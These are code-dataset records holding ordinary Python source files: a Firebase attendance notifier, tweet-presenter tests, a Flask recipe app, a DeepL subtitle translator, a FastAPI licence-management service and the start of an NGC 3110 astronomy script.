+{"seq_id":"5687363476","text":"import datetime\nimport configparser\n\nfrom requests import get\nimport json\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import db\nfrom pyfcm import FCMNotification\nimport playSound\n\n\nclass UseFirebase:\n # Load the configuration.\n private_config = configparser.ConfigParser()\n config = configparser.ConfigParser()\n private_config.read(\"private_config.ini\", encoding=\"utf-8\")\n config.read(\"config.ini\", encoding=\"utf-8\")\n # Download the client token file from the NAS and save it.\n with open(\"client_token.txt\", \"wb\") as file: # open in binary mode\n response = get(private_config[\"firebase_cloudmessaging\"][\"TOKEN_URL\"]) # get request\n print(\"download\")\n file.write(response.content) # write to file\n\n cred = credentials.Certificate(private_config[\"Firebase\"][\"KEY\"])\n # Initialize the app with a service account, granting admin privileges\n firebase_admin.initialize_app(cred, {\n 'databaseURL': private_config[\"Firebase\"][\"databaseURL\"]\n })\n\n token_list = []\n with open(\"client_token.txt\", \"r\") as r:\n token_list = r.readlines()\n CLOUDMESSAGING_APIKEY = private_config[\"firebase_cloudmessaging\"][\"APIKEY\"]\n\n @classmethod\n def cloudMessaging(cls, student_id, data, result):\n # Pass in the server key obtained from the Firebase console\n push_service = FCMNotification(cls.CLOUDMESSAGING_APIKEY)\n\n def sendMessage(body, title):\n # Message (data type)\n data_message = {\n \"body\": body,\n \"title\": title\n }\n # Send a push notification to each registered user via their token\n for token in cls.token_list:\n token = token.split(\"\\n\")[0]\n result = push_service.notify_single_device(registration_id=token, message_title=title,\n message_body=body)\n\n # Print the send result\n print(\"클라우드 메시징 전송 결과 : \", result)\n\n if result == 1:\n sendMessage(data[student_id][\"id\"], \"출석 완료\")\n elif result == 2:\n sendMessage(data[student_id][\"id\"], \"[주의] 미열\")\n elif result == 3:\n sendMessage(data[student_id][\"id\"], \"[주의] 고열\")\n elif result == 0:\n sendMessage(data[student_id][\"id\"], \"출석 오류\")\n\n # Table name: date_period_subjectcode\n @classmethod\n def updateData(cls, ref_dir, student_id, data):\n # Use the id as the key so the json data can be stored.\n data = {student_id: data}\n ref = db.reference(ref_dir)\n # Check whether data already exists for this student_id.\n snapshot = db.reference(ref_dir + \"/\" + student_id)\n temp = json.loads(json.dumps(snapshot.get()))\n print(\"id 조회결과 :\", temp)\n # Skip the insert for users that were already processed.\n if temp and temp[\"result\"] == 1:\n print(\"이미 출석한 사용자 입니다.\")\n playSound.playSound.play(\"sound/audio_4.wav\")\n return\n # Insert the data.\n ref.update(data)\n cls.cloudMessaging(student_id, data, data[student_id][\"result\"])\n print(student_id, \"학생 추가완료\")\n\n # Method that checks whether the student's info exists.\n @staticmethod\n def isChecked(ref_dir, student_id):\n student = db.reference(ref_dir + \"/\" + student_id).get()\n if student:\n return student[\"result\"]\n else:\n return 0\n\n\nif __name__ == \"__main__\":\n stu_id = \"21660074\"\n test_data = {\n \"id\": stu_id,\n \"time\": \"1234\",\n \"result\": 1,\n \"temp\": \"36.5\"\n }\n dir1 = \"210321_2_K0125146\"\n UseFirebase.updateData(dir1, stu_id, test_data)\n print(\"isChecked:\", UseFirebase.isChecked(dir1, 
stu_id))\n","repo_name":"Leekm0912/3-1_SmartAttendance","sub_path":"UseFirebase.py","file_name":"UseFirebase.py","file_ext":"py","file_size_in_byte":3924,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5352883492","text":"from unittest import mock\n\nimport twittback\nimport twittback.presenter\n\n\ndef test_insert_spans():\n tweet = twittback.Tweet(twitter_id=1, text=\"Talking to @bob about #stuff\")\n expected_url = \"http://example.com/search?pattern=stuff\"\n app = mock.Mock()\n app.url_for = mock.Mock()\n app.url_for.return_value = \"http://example.com/search?pattern=stuff\"\n html_tweet = twittback.presenter.HTMLTweet(app, tweet, \"my_user\")\n expected = \"<pre>\"\n expected += \"Talking to \"\n expected += '<span class=\"handle\">@bob</span> '\n expected += \"about \"\n expected += '<a class=\"hashtag\" href=\"%s\">#stuff</a>' % expected_url\n expected += \"</pre>\"\n assert html_tweet.html == expected\n\n\ndef test_do_not_break_urls():\n tweet = twittback.Tweet(twitter_id=1, text=\"http://example.com#1 has an anchor\")\n app = mock.Mock()\n html_tweet = twittback.presenter.HTMLTweet(app, tweet, \"my_user\")\n expected = \"<pre>\"\n expected += \"http://example.com#1 has an anchor\"\n expected += \"</pre>\"\n assert html_tweet.html == expected\n","repo_name":"iveskins/twittback","sub_path":"twittback/test/test_presenter.py","file_name":"test_presenter.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7527560127","text":"import os\nfrom flask import (\n Flask, flash, render_template,\n redirect, request, session, url_for)\nfrom flask_pymongo import PyMongo\nfrom bson.objectid import ObjectId\nif os.path.exists(\"env.py\"):\n import env\n\n\napp = Flask(__name__)\n\napp.config[\"MONGO_DBNAME\"] = os.environ.get(\"MONGO_DBNAME\")\napp.config[\"MONGO_URI\"] = os.environ.get(\"MONGO_URI\")\napp.secret_key = os.environ.get(\"SECRET_KEY\")\n\nmongo = PyMongo(app)\n\n\n@app.route(\"/\")\n@app.route(\"/index\")\ndef index():\n add_recipes = mongo.db.add_recipes.find()\n return render_template(\"index.html\", add_recipes=add_recipes)\n\n\n@app.route(\"/add_recipes\", methods=[\"GET\", \"POST\"])\ndef add_recipes():\n if request.method == \"POST\":\n recipe = {\n \"author\": request.form.get(\"author\"),\n \"recipe_name\": request.form.get(\"recipe_name\"),\n \"image_url\": request.form.get(\"image_url\"),\n \"description\": request.form.get(\"description\"),\n \"preptime\": request.form.get(\"preptime\"),\n \"bakingtime\": request.form.get(\"bakingtime\"),\n \"serves\": request.form.get(\"serves\"),\n \"ingredients\": request.form.get(\"ingredients\").split('\\r\\n'),\n \"method\": request.form.get(\"method\").split('\\r\\n')\n }\n mongo.db.add_recipes.insert_one(recipe)\n flash(\"Recipe Uploaded\")\n return redirect(url_for(\"add_recipes\"))\n return render_template(\"add_recipes.html\")\n\n\n@app.route(\"/search\", methods=[\"GET\", \"POST\"])\ndef search():\n if request.method == \"POST\":\n query = request.form.get(\"query\")\n add_recipes = mongo.db.add_recipes.find({\"$text\": {\"$search\": query}})\n return render_template(\"search.html\", add_recipes=add_recipes)\n else:\n return render_template(\"search.html\")\n\n\n@app.route(\"/view_more/<recipe_id>\")\ndef view_more(recipe_id):\n recipe = mongo.db.add_recipes.find_one({\"_id\": ObjectId(recipe_id)})\n print(recipe)\n return render_template(\"view_more.html\", 
recipe=recipe)\n\n\n@app.route(\"/update_recipe/<recipe_id>\", methods=[\"GET\", \"POST\"])\ndef update_recipe(recipe_id):\n if request.method == \"POST\":\n ingredientsArray = []\n methodArray = []\n for key in request.form:\n if key == \"ingredients\":\n value = request.form[key]\n ingredientsArray.append(value)\n if key == \"method\":\n value = request.form[key]\n methodArray.append(value)\n submit = {\n \"author\": request.form.get(\"author\"),\n \"recipe_name\": request.form.get(\"recipe_name\"),\n \"image_url\": request.form.get(\"image_url\"),\n \"description\": request.form.get(\"description\"),\n \"preptime\": request.form.get(\"preptime\"),\n \"bakingtime\": request.form.get(\"bakingtime\"),\n \"serves\": request.form.get(\"serves\"),\n \"ingredients\": ingredientsArray,\n \"method\": methodArray\n }\n mongo.db.add_recipes.update({\"_id\": ObjectId(recipe_id)}, submit)\n flash(\"Recipe Updated\")\n return redirect(url_for('index'))\n\n recipe = mongo.db.add_recipes.find_one({\"_id\": ObjectId(recipe_id)})\n return render_template(\"update_recipe.html\", recipe=recipe)\n\n\n@ app.route(\"/delete_recipe/<recipe_id>\")\ndef delete_recipe(recipe_id):\n mongo.db.add_recipes.remove({\"_id\": ObjectId(recipe_id)})\n flash(\"Recipe Deleted\")\n return redirect(url_for(\"add_recipes\"))\n\n\nif __name__ == \"__main__\":\n app.run(host=os.environ.get(\"IP\"),\n port=int(os.environ.get(\"PORT\")),\n debug=True)\n","repo_name":"Amiejohnstone18/The_Baking_Book","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6890073235","text":"# -*- coding: utf-8 -*-\n# Thanks to the people at Hacklab Kika and the people on stackoverflow that helped me fix some of the bugs I encountered during writing this.\n\nimport argparse\nimport pysrt \nimport os\nimport shutil\nimport sys\nimport time\nfrom datetime import datetime\nimport tempfile\nimport asyncio\n\n# Now this is where all the fun begins\t\n\nasync def puppeteer(elements, to_lang, from_lang):\n\tfrom deepl_scraper_pp.deepl_tr import deepl_tr\n\tcoros = [await deepl_tr(elem['text'], to_lang=to_lang, from_lang=from_lang) for elem in elements ]\n\treturn coros\n\ndef translate(input, output, languagef, languaget, api_key):\n\t\"\"\"\n\tTranslate each subtitle block\n\t\"\"\"\n\n\tif api_key:\n\t\tprint(\"Using Deepl's API. 
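A side note on the PyMongo calls in the Flask record above: Collection.update() and Collection.remove() are the legacy API and were removed in PyMongo 4; the single-document equivalents would look like the hedged sketch below, with the collection and names reused from that file:

# Hedged PyMongo 4 equivalents of the update()/remove() calls above.
from bson.objectid import ObjectId

def update_recipe_doc(collection, recipe_id, submit):
    # $set updates the listed fields instead of replacing the whole document
    collection.update_one({"_id": ObjectId(recipe_id)}, {"$set": submit})

def delete_recipe_doc(collection, recipe_id):
    collection.delete_one({"_id": ObjectId(recipe_id)})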
Should be faster.\")\n\t\tfrom deep_translator import DeepL\n\telse:\n\t\tprint('Scraping Deepl, this may take some time....')\n\t\tloop = asyncio.get_event_loop()\n\n\tsubs = pysrt.open(input)\n\telements = []\n\telements_translated = []\n\tfor index, sub in enumerate(subs):\n\t\tentry = {'index': sub.index, 'start_time': sub.start, 'end_time': sub.end, 'text': sub.text}\n\t\telements.append(entry)\n\t\telements_translated.append(entry)\n\n\tcounter = 20\n\tsecond_counter = 0\n\twhile elements != []:\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tif not api_key:\n\t\t\t\t\ttranslatedSentences = loop.run_until_complete(asyncio.gather(puppeteer(elements[:counter], languaget, languagef), return_exceptions=True))\n\t\t\t\t\ttranslatedSentences = translatedSentences[0]\n\t\t\t\telse:\n\t\t\t\t\t# translate_batch expects a list of plain strings\n\t\t\t\t\ttranslatedSentences = DeepL(api_key, source=languagef, target=languaget).translate_batch([elem['text'] for elem in elements[:counter]])\n\t\t\texcept:\n\t\t\t\ttranslatedSentences = [None for elem in range(counter)]\n\n\t\t\tfor sentence in translatedSentences:\n\t\t\t\ttry:\n\t\t\t\t\telements_translated[second_counter]['text'] = sentence\n\t\t\t\t\tprint(f\"{elements_translated[second_counter]['index']}. -> {elements_translated[second_counter]['text']}\")\n\t\t\t\t\tsecond_counter+=1\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\n\t\t\tdel elements[:counter]\n\t\t\tbreak\n\n\tprint(elements)\n\twith open(output, 'w') as fileresp: # Use w mode instead\n\t\tfor element in elements_translated:\n\t\t\ttry:\n\t\t\t\tprint(f\"{element['start_time']} {element['text']}\")\n\t\t\t\tfileresp.write(f\"{element['index']}\\n{element['start_time']} --> {element['end_time']}\\n{element['text']}\\n\\n\")\n\t\t\texcept:\n\t\t\t\tpass\n\ndef parsefiles(inputFile, outputFile, languageFrom, languageTo, api_key):\n\tif inputFile == None:\n\t\tprint(\"Input file not specified! Exiting...\")\n\t\tsys.exit(2)\n\tif languageTo == None:\n\t\tprint(\"Language not specified! 
Exiting...\")\n\t\tsys.exit(2)\n\n\tif outputFile == None:\n\t\toutputFile = inputFile + languageTo + '.srt'\n\n\ttempFile = tempfile.NamedTemporaryFile(suffix='.srt',delete=False)\n\tshutil.copyfile(inputFile,tempFile.name)\n\tshutil.copyfile(inputFile, outputFile) \n\t# Due to a bug that files cannot be accessed I had to move everything to another function\n\ttranslate(inputFile, outputFile, languageFrom, languageTo, api_key)\n\ndef main():\n\t# Parse Arguments\n\tparser = argparse.ArgumentParser(description='Python Program that translates a subtitle file using deepl')\n\tparser.add_argument('-i', '--input-file', action=\"store\", help=\"takes the input file\", metavar=\"FILE\")\n\tparser.add_argument('-o', '--output-file', action=\"store\", help=\"takes the output file\", metavar=\"FILE\")\n\tparser.add_argument('-lf', '--language-from', action=\"store\", help=\"language to translate from\", default=\"auto\")\n\tparser.add_argument('-lt', '--language-to', action=\"store\", help=\"language to translate to\")\n\tparser.add_argument('-a', '--api-key', action=\"store\", help=\"Deepl API Key - Optional\")\n\targs = parser.parse_args()\n\tparsefiles(args.input_file, args.output_file, args.language_from, args.language_to, args.api_key)\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"MatejMecka/captionsTranslator","sub_path":"captionsTranslator.py","file_name":"captionsTranslator.py","file_ext":"py","file_size_in_byte":3682,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"44087906922","text":"from fastapi import HTTPException, status\n\nfrom .schemas import ModuleCreate, LicenceCreate, SoftwareCreate, EmployeeLicenceCreate, EmployeeLicenceUpdate, \\\n SoftwareUpdate, SoftwareDB, Software, ModuleDB, ModuleUpdate, LicenceDB, Licence, LicenceUpdate, \\\n EmployeeLicenceDB, SoftwareModulesCreate, SoftwareModulesDB, SoftwarePage, \\\n SoftwareWithModulesCreate, LicencePage, ClientLicenceDB, ClientLicenceCreate\nfrom ..accounts.client_account.models import clients\nfrom ..accounts.client_account.schemas import ClientDB\nfrom ..db.db import database\nfrom .models import softwares, modules, licences, employee_licences, software_modules, client_licences\nfrom ..errors import Errors\nfrom typing import List, Optional\n\n\nasync def get_software_list(last_id: int = 0, limit: int = 9) -> List[Software]:\n query = softwares.select().where(softwares.c.id > last_id).limit(limit)\n result = await database.fetch_all(query=query)\n list_of_software = []\n for software in result:\n software = dict(software)\n module = await get_software_modules(software[\"id\"])\n list_of_software.append(Software(**dict({**software, \"modules\": module})))\n return list_of_software\n\n\nasync def get_software_db_list() -> List[SoftwareDB]:\n result = await database.fetch_all(query=softwares.select())\n return [SoftwareDB(**dict(software)) for software in result]\n\n\nasync def get_software_page(last_id: int = 0, limit: int = 9) -> SoftwarePage:\n software_list = await get_software_list(last_id, limit)\n modules_list = await get_modules_db()\n return SoftwarePage(**dict({\"software_list\": software_list, \"modules_list\": modules_list}))\n\n\nasync def get_software(software_id: int) -> Optional[SoftwareDB]:\n result = await database.fetch_one(query=softwares.select().where(softwares.c.id == software_id))\n if result is not None:\n return SoftwareDB(**dict(result))\n return None\n\n\nasync def get_software_by_name(software_name: str) -> Optional[SoftwareDB]:\n 
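A sanity check for the API branch in the captionsTranslator.py record above: deep_translator's DeepL translate_batch takes a list of strings, which is why the call extracts elem['text'] before batching. The key and texts below are placeholders:

# Hedged deep_translator usage sketch; "YOUR_KEY" is a placeholder value.
from deep_translator import DeepL

texts = ["Hello world", "See you tomorrow"]
print(DeepL(api_key="YOUR_KEY", source="en", target="de").translate_batch(texts))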
result = await database.fetch_one(query=softwares.select().where(softwares.c.name == software_name))\n if result:\n return SoftwareDB(**dict(result))\n return None\n\n\nasync def get_software_with_modules(software_id: int) -> Optional[Software]:\n result = await database.fetch_one(query=softwares.select().where(softwares.c.id == software_id))\n if result is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=Errors.SOFTWARE_IS_NOT_EXIST\n )\n module = await get_software_modules(software_id)\n return Software(**dict({**dict(result), \"modules\": module}))\n\n\nasync def add_software(software: SoftwareCreate) -> SoftwareDB:\n if await get_software_by_name(software.name):\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=Errors.SOFTWARE_IS_EXIST,\n )\n query = softwares.insert().values(**software.dict())\n software_id = await database.execute(query)\n return SoftwareDB(**dict({\"id\": software_id, **software.dict()}))\n\n\nasync def add_software_with_modules(software_with_modules: SoftwareWithModulesCreate) -> SoftwareDB:\n software = await add_software(SoftwareCreate(name=software_with_modules.name))\n modules_list = software_with_modules.modules\n for module_id in modules_list:\n try:\n module = await add_software_module(software.id, module_id)\n except Exception as e:\n print(e)\n return software\n\n\nasync def update_software(software_id: int, software: SoftwareUpdate) -> SoftwareDB:\n if await get_software(software_id) is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=Errors.SOFTWARE_IS_NOT_EXIST,\n )\n query = softwares.update().where(softwares.c.id == software_id).values(**software.dict())\n await database.execute(query)\n return SoftwareDB(**dict({\"id\": software_id, **software.dict()}))\n\n\nasync def delete_software(software_id: int) -> None:\n if await get_software(software_id) is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=Errors.SOFTWARE_IS_NOT_EXIST,\n )\n query = softwares.delete().where(softwares.c.id == software_id)\n await database.execute(query)\n\n\nasync def get_software_module(software_id: int, module_id: int) -> Optional[SoftwareModulesDB]:\n query = software_modules.select(). 
\\\n where((software_modules.c.software_id == software_id) & (software_modules.c.module_id == module_id))\n result = await database.fetch_one(query=query)\n if result:\n return SoftwareModulesDB(**dict(result))\n return None\n\n\nasync def get_software_modules(software_id: int) -> List[ModuleDB]:\n query = software_modules.select().where(software_modules.c.software_id == software_id)\n result = await database.fetch_all(query=query)\n return [await get_module(software_module.module_id) for software_module in result]\n\n\nasync def add_software_module(software_id: int, module_id: int) -> SoftwareModulesDB:\n if await get_software_module(software_id, module_id):\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=Errors.MODULE_FOR_THIS_SOFTWARE_IS_EXIST,\n )\n if await get_module(module_id) is None:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=Errors.MODULE_IS_NOT_EXIST,\n )\n software_module = SoftwareModulesCreate(**dict({\"software_id\": software_id, \"module_id\": module_id}))\n query = software_modules.insert().values(software_module.dict())\n software_module_id = await database.execute(query)\n return SoftwareModulesDB(**dict({\"id\": software_module_id, **software_module.dict()}))\n\n\nasync def delete_software_module(software_id: int, module_id: int) -> None:\n if await get_software_module(software_id, module_id) is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=Errors.MODULE_FOR_THIS_SOFTWARE_IS_NOT_EXIST,\n )\n query = software_modules.delete(). \\\n where((software_modules.c.software_id == software_id) & (software_modules.c.module_id == module_id))\n await database.execute(query)\n\n\nasync def get_modules_db() -> List[ModuleDB]:\n result = await database.fetch_all(query=modules.select())\n return [ModuleDB(**dict(module)) for module in result]\n\n\nasync def get_modules(last_id: int = 0, limit: int = 9) -> List[ModuleDB]:\n query = modules.select().where(modules.c.id > last_id).limit(limit)\n result = await database.fetch_all(query=query)\n modules_list = []\n for module in result:\n modules_list.append(ModuleDB(**dict(module)))\n return modules_list\n\n\nasync def get_module(module_id: int) -> Optional[ModuleDB]:\n result = await database.fetch_one(query=modules.select().where(modules.c.id == module_id))\n if result is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=Errors.MODULE_IS_NOT_EXIST,\n )\n return ModuleDB(**dict(result))\n\n\nasync def get_module_by_name(module_name: str) -> Optional[ModuleDB]:\n result = await database.fetch_one(query=modules.select().where(modules.c.name == module_name))\n if result is not None:\n return ModuleDB(**dict(result))\n return None\n\n\nasync def add_module(module: ModuleCreate) -> ModuleDB:\n if await get_module_by_name(module.name) is not None:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=Errors.MODULE_IS_EXIST,\n )\n query = modules.insert().values(**module.dict())\n module_id = await database.execute(query)\n return ModuleDB(**dict({\"id\": module_id, **module.dict()}))\n\n\nasync def update_module(module_id: int, module: ModuleUpdate) -> ModuleDB:\n if await get_module(module_id) is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=Errors.MODULE_IS_NOT_EXIST,\n )\n query = modules.update().where(modules.c.id == module_id).values(**module.dict())\n await database.execute(query)\n return ModuleDB(**dict({\"id\": module_id, **module.dict()}))\n\n\nasync def 
delete_module(module_id: int) -> None:\n if await get_module(module_id) is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=Errors.MODULE_IS_NOT_EXIST,\n )\n query = modules.delete().where(modules.c.id == module_id)\n await database.execute(query)\n\n\nasync def get_licences_db() -> List[LicenceDB]:\n result = await database.fetch_all(query=licences.select())\n licences_list = []\n for licence in result:\n licences_list.append(LicenceDB(**dict(licence)))\n return licences_list\n\n\nasync def get_licences(last_id: int = 0, limit: int = 9) -> List[Licence]:\n query = licences.select().where(licences.c.id > last_id).limit(limit)\n result = await database.fetch_all(query=query)\n licences_list = []\n for licence in result:\n licence = dict(licence)\n software = await get_software(licence[\"software_id\"])\n closed_vacancies = await get_count_employee_for_licence_id(licence[\"id\"])\n licences_list.append(Licence(**dict({**licence, \"software\": software, \"closed_vacancies\": closed_vacancies})))\n return licences_list\n\n\nasync def get_licence_page(last_id: int = 0, limit: int = 9) -> LicencePage:\n licences_list = await get_licences(last_id, limit)\n software_list = await get_software_db_list()\n return LicencePage(**dict({\"licences_list\": licences_list, \"software_list\": software_list}))\n\n\nasync def get_licence(licence_id: int) -> Optional[Licence]:\n result = await database.fetch_one(query=licences.select().where(licences.c.id == licence_id))\n if result is not None:\n licence = dict(result)\n software = await get_software(licence[\"software_id\"])\n closed_vacancies = await get_count_employee_for_licence_id(licence[\"id\"])\n return Licence(**dict({**licence, \"software\": software, \"closed_vacancies\": closed_vacancies}))\n return None\n\n\nasync def get_licence_db(licence_id: int) -> Optional[LicenceDB]:\n result = await database.fetch_one(licences.select().where(licences.c.id == licence_id))\n if result:\n return LicenceDB(**dict(result))\n return None\n\n\nasync def get_licence_by_number(licence_number: int) -> Optional[LicenceDB]:\n result = await database.fetch_one(licences.select().where(licences.c.number == int(licence_number)))\n if result:\n return LicenceDB(**dict(result))\n return None\n\n\nasync def add_licence(licence: LicenceCreate) -> LicenceDB:\n if await get_licence_by_number(licence.number):\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=Errors.LICENCE_IS_EXIST,\n )\n if await get_software(licence.software_id) is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=Errors.SOFTWARE_IS_NOT_EXIST,\n )\n query = licences.insert().values(licence.dict())\n licence_id = await database.execute(query)\n return LicenceDB(**dict({\"id\": licence_id, **licence.dict()}))\n\n\nasync def update_licence(licence_id: int, licence: LicenceUpdate) -> LicenceDB:\n old_licence = await get_licence_db(licence_id)\n if old_licence is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=Errors.LICENCE_IS_NOT_EXIST,\n )\n licence = dict(licence)\n old_licence = dict(old_licence)\n for field in licence:\n if licence[field]:\n old_licence[field] = licence[field]\n query = licences.update().where(licences.c.id == licence_id).values(**old_licence)\n result = await database.execute(query=query)\n return await get_licence_db(licence_id)\n\n\nasync def delete_licence(licence_id: int) -> None:\n if await get_licence_db(licence_id) is None:\n raise HTTPException(\n 
status_code=status.HTTP_404_NOT_FOUND,\n detail=Errors.LICENCE_IS_NOT_EXIST,\n )\n query = licences.delete().where(licences.c.id == licence_id)\n await database.execute(query)\n\n\nasync def get_count_employee_for_licence_id(licence_id: int) -> int:\n query = employee_licences.select().where(employee_licences.c.licence_id == licence_id)\n result = await database.fetch_all(query=query)\n return len(result)\n\n\nasync def get_free_vacancy_in_licence(licence_id: int) -> int:\n licence = await get_licence_db(licence_id)\n count_employees = await get_count_employee_for_licence_id(licence_id)\n if licence is not None:\n return licence.count_members - count_employees\n return 0\n\n\nasync def get_employee_licence(employee_id: str) -> Optional[LicenceDB]:\n query = employee_licences.select().where(employee_licences.c.employee_id == employee_id)\n result = await database.fetch_one(query=query)\n if result:\n employee_licence = dict(result)\n licence = await get_licence_db(employee_licence[\"licence_id\"])\n return licence\n return None\n\n\nasync def add_employee_licence(employee_id: str, licence_id: int) -> EmployeeLicenceDB:\n if await get_employee_licence(str(employee_id)):\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=Errors.USER_HAS_ANOTHER_LICENCE,\n )\n if await get_licence_db(licence_id) is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=Errors.LICENCE_IS_NOT_EXIST,\n )\n if await get_free_vacancy_in_licence(licence_id) <= 0:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=Errors.LICENCE_IS_FULL,\n )\n employee_licence = EmployeeLicenceCreate(**dict({\"employee_id\": str(employee_id), \"licence_id\": licence_id}))\n query = employee_licences.insert().values(**employee_licence.dict())\n employee_licence_id = await database.execute(query)\n return EmployeeLicenceDB(**dict({\"id\": employee_licence_id, **employee_licence.dict()}))\n\n\nasync def update_employee_licence(employee_id: str, licence_id: int) -> EmployeeLicenceDB:\n if await get_free_vacancy_in_licence(licence_id) <= 0:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=Errors.LICENCE_IS_FULL,\n )\n employee_licence = EmployeeLicenceUpdate(**dict({\"licence_id\": licence_id}))\n query = employee_licences.update().where(employee_licences.c.employee_id == employee_id).values(\n **employee_licence.dict())\n employee_licence_id = await database.execute(query)\n return EmployeeLicenceDB(**dict({\"id\": employee_licence_id, \"employee_id\": employee_id, **employee_licence.dict()}))\n\n\nasync def get_client_licence(client_id: int, licence_id: int) -> Optional[ClientLicenceDB]:\n query = client_licences.select().\\\n where((client_licences.c.client_id == client_id) & (client_licences.c.licence_id == licence_id))\n result = await database.fetch_one(query=query)\n if result:\n return ClientLicenceDB(**dict(result))\n return None\n\n\nasync def get_client_licences(client_id: int) -> List[Licence]:\n query = client_licences.select().where(client_licences.c.client_id == client_id)\n result = await database.fetch_all(query=query)\n client_licences_list = []\n for client_licence in result:\n client_licence = dict(client_licence)\n licence = dict(await get_licence_db(client_licence[\"licence_id\"]))\n closed_vacancies = await get_count_employee_for_licence_id(client_licence[\"licence_id\"])\n software = await get_software(licence[\"software_id\"])\n client_licences_list.append(\n Licence(**dict({**licence, \"closed_vacancies\": 
closed_vacancies, \"software\": software})))\n return client_licences_list\n\n\nasync def add_client_licence(client_id: int, licence_id: int) -> ClientLicenceDB:\n if await get_client_licence(client_id, licence_id) is not None:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=Errors.CLIENT_HAS_THIS_LICENCE,\n )\n if await get_licence_db(licence_id) is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=Errors.LICENCE_IS_NOT_EXIST,\n )\n client_licence = ClientLicenceCreate(**dict({\"client_id\": client_id, \"licence_id\": licence_id}))\n query = client_licences.insert().values(**client_licence.dict())\n employee_licence_id = await database.execute(query)\n client = await activate_client(client_id)\n return ClientLicenceDB(**dict({\"id\": employee_licence_id, **client_licence.dict()}))\n\n\nasync def activate_client(client_id: int) -> Optional[ClientDB]:\n current_client = await database.fetch_one(query=clients.select().where(clients.c.id == client_id))\n if current_client:\n current_client = dict(current_client)\n current_client[\"is_active\"] = True\n await database.execute(query=clients.update().where(clients.c.id == client_id).values(**current_client))\n return current_client\n","repo_name":"Crocodily-3-0/udv_service_desk","sub_path":"src/reference_book/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":17132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16949449224","text":"import os\nimport sys\nimport re\nimport glob\nimport numpy as np\nimport scipy\nfrom astropy.coordinates import SkyCoord\nsys.path.append(os.getcwd() + \"/../\")\nimport mycasaanalysis_tools3 as myana\n\n\n#####################\n### parameters\n#####################\ndir_data = \"/Users/saito/data/myproj_published/proj_ts08_ngc3110/image_nyquist/\"\ntxt_flux = \"ngc3110_all_sum.txt\"\nra = \"10h04m02.090s\"\ndecl = \"-6d28m29.604s\"\nredshift = 0.016858\n\nrepimage = dir_data + \"../image_12co10/12co10.moment0\"\ntxt_tkin = dir_data+\"ngc3110_radex_tkin.txt\"\n\n\n#####################\n### def\n#####################\ndef degcoord(ra,decl):\n c = SkyCoord(ra, decl)\n ra_dgr = str(c.ra.degree)\n dec_dgr = str(c.dec.degree)\n\n return ra_dgr, dec_dgr\n\ndef distance_kpc(x1,y1,ra,decl,pa=171.,incl=65.,scale=0.325):\n ra_cnt, decl_cnt = degcoord(ra,decl)\n x2 = x1 - float(ra_cnt)\n y2 = y1 - float(decl_cnt)\n \n pa2 = pa * np.pi/180.\n incl2 = incl * np.pi/180.\n\n x3 = (x2*np.cos(pa2) - y2*np.sin(pa2)) / np.cos(incl2)\n y3 = x2*np.sin(pa2) + y2*np.cos(pa2)\n distance = np.sqrt(x3**2 + y3**2) * 3600. 
